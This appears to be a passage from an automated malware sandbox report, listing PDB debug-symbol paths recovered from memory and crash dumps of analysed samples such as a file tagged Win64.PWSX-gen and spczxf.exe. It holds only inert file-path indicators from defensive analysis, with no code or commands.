                  Source: Binary string: System.Data.DataSetExtensions.pdbSystem.Threading.Tasks.Parallel.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ComponentModel.Composition.Registration.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.CSharp.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Utilities.v4.0.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IdentityModel.Selectors.pdbSystem.Text.Encoding.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.pdbSystem.Messaging.dllSystem.Data.SqlXml.dllMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: Microsoft.CSharp.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Configuration.Install.pdb` source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Activities.Build.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: spczxf.PDB source: spczxf.exe, 00000008.00000002.1734269034.00000098BFCF3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.JScript.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.Design.pdbH source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.Composition.pdbSystem.Diagnostics.Contracts.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualBasic.Activities.Compiler.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Routing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Web.Services.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Data.Entity.Build.Tasks.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.pdbSystem.Windows.Forms.DataVisualization.Design.dllP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Abstractions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: sysglobl.pdbMZ@ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IdentityModel.Services.pdbMicrosoft.VisualBasic.Compatibility.Data.dllMicrosoft.VisualBasic.Activities.Compiler.dllMicrosoft.VisualBasic.Activities.Compiler.dllMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IdentityModel.Selectors.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: BpC:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.PDB source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb| source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Drawing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Management.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Users\user\Desktop\HFayo.pdb\M source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Runtime.Serialization.pdbSystem.Security.SecureString.dll??\ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.Web.pdb`@ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IO.Compression.FileSystem.pdbMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Web.DataVisualization.Design.pdbMicrosoft.Build.Framework.dllh source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Web.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbSILZ source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E99246000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IO.Log.pdbSystem.Diagnostics.TextWriterTraceListener.dll( source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Runtime.Remoting.ni.pdbRSDS-L source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Extensions.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualC.pdbSystem.ValueTuple.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\spczxf.PDBn.0 source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9D1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Data.Entity.pdb8 source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Workflow.Activities.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IdentityModel.Services.pdbMZ source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Numerics.Vectors.pdbh source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.ServiceModel.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Accessibility.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Web.Services.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.IdentityModel.pdbMZ source: WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Messaging.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.pdb source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: sysglobl.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Activities.Core.Presentation.pdb( source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Data.Entity.Build.Tasks.pdbSystem.Runtime.ni.dll source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.ServiceModel.Web.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.Composition.Registration.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: sysglobl.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Deployment.pdbMZ source: WER95BE.tmp.dmp.46.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Activities.Presentation.pdb_C source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.Services.Client.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: mscorlib.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Diagnostics.Tracing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Linq.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.pdbH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.IO.Compression.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.RegularExpressions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xaml.pdbMZ@ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.Entity.pdbp source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.Formatters.Soap.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.WasHosting.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Channels.pdbh$ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IdentityModel.Selectors.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: aspnet_wp.pdb source: Microsoft.exe, 00000010.00000002.3894308212.00007FF7FE547000.00000004.00000001.01000000.0000000E.sdmp, Microsoft.exe, 00000010.00000000.1785763182.00007FF7FE547000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.exed source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Windows.ApplicationServer.Applications.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.PDB source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xaml.ni.pdbRSDSDg{V source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Framework.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.Routing.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Core.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.pdb! source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Transactions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Caching.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IO.Compression.FileSystem.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \Registry\Machine\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32objr\x86\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbSystem.Web.RegularExpressions.dllSystem.Web.RegularExpressions.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp, spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Web.RegularExpressions.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Data.SqlXml.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.RegularExpressions.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Runtime.ni.pdb( source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IO.Compression.FileSystem.pdbSystem.Xml.XmlSerializer.dllH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Data.Entity.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.Mobile.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Transactions.Bridge.pdb8 source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Linq.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Windows.Forms.DataVisualization.Design.pdbPj source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: SMDiagnostics.pdbP source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Xml.Linq.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xaml.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbzS source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Dynamic.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wmplayer.pdbGCTL source: wmplayer.exe, 00000029.00000003.2458942503.000001DDEEFF0000.00000004.00000001.00020000.00000000.sdmp, pkiwizgebqxq.exe.41.dr
                  Source: Binary string: NGenTaskLauncher.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Data.Services.Design.pdbMZ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.Services.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: BindoC:\Windows\HFayo.pdb source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665472479.00000042D62F3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Runtime.DurableInstancing.pdbH source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.DirectoryServices.Protocols.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.DataAnnotations.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Serialization.pdbP source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Activities.Core.Presentation.pdbP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.Build.Engine.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.Linq.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.WindowsRuntime.UI.Xaml.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: pC:\Users\user\AppData\Local\Temp\spczxf.PDB source: spczxf.exe, 00000008.00000002.1734269034.00000098BFCF3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ComponentModel.Composition.Registration.pdbSystem.Reflection.Emit.Lightweight.dllH source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Drawing.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceModel.ni.pdbRSDS source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Core.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.Design.pdb:\W/M source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: Microsoft.Build.Tasks.v4.0.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.Protocols.pdb:\W source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: wmplayer.pdb source: wmplayer.exe, 00000029.00000003.2458942503.000001DDEEFF0000.00000004.00000001.00020000.00000000.sdmp, pkiwizgebqxq.exe.41.dr
                  Source: Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.PDBJ source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1665839826.0000016E991D5000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualC.pdbSystem.Xml.XPath.XDocument.dllSystem.Xml.XPath.XDocument.dll source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Device.pdbSystem.Threading.Tasks.Parallel.dllPP source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Workflow.Activities.pdb &8 source: WER95BE.tmp.dmp.46.dr
                  Source: Binary string: System.Messaging.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.EnterpriseServices.pdb( source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Management.pdbMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\HFayo.pdbdb@ source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4DE1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Activities.Core.Presentation.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.AddIn.Contract.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ComponentModel.DataAnnotations.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Management.Instrumentation.pdbMZ source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Caching.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Core.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Web.Extensions.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.ServiceProcess.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.EnterpriseServices.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Web.DynamicData.Design.pdb( source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Web.DataVisualization.Design.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\spczxf.PDB source: spczxf.exe, 00000008.00000002.1734269034.00000098BFCF3000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\HFayo.pdbBS source: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe, 00000000.00000002.1670799032.0000016EB4D62000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Activities.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Net.pdb source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: XamlBuildTask.pdbP4 source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.pdbP source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.Deployment.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Security.pdbH source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.ServiceModel.Activation.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.DirectoryServices.AccountManagement.pdbP< source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: Microsoft.Build.Framework.pdb0; source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb} source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: spczxf.exe, 00000008.00000002.1740777553.000001A4CD9E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.DirectoryServices.Protocols.pdbSystem.Windows.Forms.DataVisualization.Design.dll source: WER696F.tmp.dmp.30.dr
                  Source: Binary string: System.IO.Compression.pdbMicrosoft.VisualC.dllMZ source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr, WER2A76.tmp.dmp.6.dr
                  Source: Binary string: System.Web.DynamicData.Design.pdb` source: WER85A6.tmp.dmp.15.dr
                  Source: Binary string: Microsoft.VisualBasic.Compatibility.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Net.Http.ni.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
                  Source: Binary string: System.Xaml.pdb source: WER95BE.tmp.dmp.46.dr, WER696F.tmp.dmp.30.dr, WER85A6.tmp.dmp.15.dr
